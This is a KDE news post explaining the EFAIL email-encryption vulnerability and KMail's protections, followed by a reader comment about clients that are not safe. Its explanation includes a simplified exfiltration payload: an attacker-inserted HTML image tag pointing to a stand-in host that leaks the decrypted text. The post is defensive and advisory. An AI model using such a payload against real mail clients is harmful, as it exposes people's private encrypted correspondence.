---
title: "EFAIL and KMail"
date:    2018-05-15
authors:
  - "Paul Brown"
slug:    efail-and-kmail
comments:
  - subject: "It's only secure if all involved clients are secure"
    date: 2018-05-15
    body: "<p>You conclude that as long as you are using KMail, you're safe. I'd disagree with that. What's true is that as long as <strong>everyone involved in the conversation </strong>uses email clients that are not affected by this vulnerability, it's safe.</p><p style=\"pointer-events: auto;\">As soon as the encrypted content gets to anybody who has the needed private key to decrypt it and uses an unsafe client, the conversation is compromised. That's why the the EFF ( https://www.eff.org/deeplinks/2018/05/not-so-pretty-what-you-need-know-about-e-fail-and-pgp-flaw-0 ) currently recommends to not send encrypted emails <strong>unless you can be sure that their content will never be decrypted in a vulnerable client</strong>.</p>"
    author: "thomaspfeiffer"
---
<img style="" src="/sites/dot.kde.org/files/security-2688911_1280.jpg">

On Monday, a security vulnerability in the OpenPGP and S/MIME email encryption standards and the email clients using those, called <a href="https://www.efail.de/">EFAIL</a> was published. 

What is this about and how is KMail affected? (Spoiler: <b>KMail users are safe by default.</b>)

<h2>Encrypted Email</h2>

The discovered vulnerability affects the OpenPGP and S/MIME standards used for end-to-end encryption of emails that specifically encrypts emails for the intended receivers. This is not to be confused with transport encryption (typically TLS) that is used universally when communicating with an email server. Users not using OpenPGP and S/MIME are not affected by this vulnerability.

End-to-end encryption is usually employed to prevent anyone different from the intended receiver from accessing message content, even if they somehow manage to intercept or accidentally receive an email. The EFAIL attack does not attempt 
to break that encryption itself. Instead, it applies some clever techniques to trick the intended receiver into decrypting the message, and then sending the clear text content back to the attacker.

KMail relies on GnuPG for the OpenPGP and S/MIME handling, so you might also be interested in the <a href="https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060315.html">GnuPG team's statement</a> on EFAIL.

<h2>Exfiltration Channels</h2>

The EFAIL research paper proposes several exfiltration channels for returning the clear text content. The easiest one to understand is by exploiting the HTML capabilities of email clients. If not properly controlled, HTML email messages can download external resources, such as images, while displaying an email - a feature often used in corporate environments.

Considerably simplified, the idea is to add additional encrypted content around an intercepted encrypted message. The whole procedure for doing this is quite elaborate and explained in depth in the paper. Let's assume an attacker manages to prefix an intercepted encrypted email with the (encrypted) string "&lt;img src='http://my.site/?" and append an extra "'/&gt;". The result would look something like this, after decryption by the receiver:

<table style="margin: 10px">
<tr>
<th style="border-style:solid; border-width: 2px; padding: 10px">Attacker inserted</th><th style="border-style:solid; border-width: 2px; padding: 10px">Original content</th><th style="border-style:solid; border-width: 2px; padding: 10px"></th>
</tr>
<tr>
<td style="border-style:solid; border-width: 2px; padding: 10px">&lt;img src="http://my.site/?</td><td style="border-style:solid; border-width: 2px;  padding: 10px">SomeTopSecretText</td><td style="border-style:solid; border-width: 2px; padding: 10px">"/></td>
</tr>
</table>

An email client that unconditionally retrieves content from the Internet while displaying HTML emails would now leak the email content as part of an HTTP GET request to an attacker controlled web server - game over.

<h2>OpenPGP</h2>

The OpenPGP standard has a built-in detection mechanism for manipulations of the encrypted content. This provides effective protection against this attack. KMail, or rather the GnuPG stack KMail uses for email cryptography, does make use of this correctly. Not all email clients tested by the EFAIL authors seem to do this correctly, though. Notwithstanding, <strong>your OpenPGP encrypted emails are safe from this attack if you use KMail</strong>.

<h2>S/MIME</h2>

The situation with S/MIME is more difficult, as S/MIME itself does not have any integrity protection for the encrypted content, leaving email clients with no way to detect the EFAIL attack. That's a conceptual weakness of S/MIME that can only really be fixed by moving to an improved standard.

Fortunately, this does not mean that your S/MIME encrypted emails cannot be protected in KMail. By default, KMail does not retrieve external content for HTML emails. It only does that if you either explicitly trigger this for an individual email by clicking the red warning box at the top of emails which informs of external content, or if you enable this unconditionally via <i>Settings</i> > <i>Configure KMail</i> > <i>Security</i> > <i>Reading</i> > <i>Allow messages to load external references from the Internet</i>. Starting with version 18.04.01, the latter setting will be ignored for S/MIME encrypted content as an additional precaution. For older versions, we recommend you make sure this setting is disabled.

Furthermore, distribution maintainers can get patches to solve this problem from here:

https://phabricator.kde.org/D12391
https://phabricator.kde.org/D12393
https://phabricator.kde.org/D12394

<h2>CRL and OCSP</h2>

In order to revoke compromised signing keys, S/MIME relies on certificate revocation lists (CRLs) or the online certificate status protocol (OCSP). These two mechanisms consult an online server defined by the authority managing the 
respective keys. The EFAIL paper suggests that this might be another possible exfiltration channel, as well as HTML. However, this hasn't been demonstrated yet, and the GnuPG team thinks it is unlikely to work. It is also a relevant piece 
of the S/MIME security model, so simply disabling this as a precaution has security implications, too.

Therefore, we have not changed the default settings for this in KMail at this point. The reason is because compromised and thus revoked keys seem to be the more common concern than an elaborate targeted attack that would employ CRL or OCSP as an exfiltration channel (if possible at all). You'll find the corresponding settings for the CRL and OCSP usage under <i>Settings</i> > <i>Configure KMail</i> > <i>Security</i> > <i>S/MIME Validation</i> should you want to review or change them.

<h2>Conclusion</h2>

Research in email client and email cryptography security is very much appreciated and badly needed, considering how prevalent email is in our daily communication. As the results show, S/MIME is showing its age and is in need of conceptual improvements. Also, EFAIL again highlights the dangers to privacy caused by HTML emails with external references. Most importantly, this shows that your emails are well-protected by KMail and GnuPG, and there is certainly no reason to panic and stop using email encryption.
<!--break-->
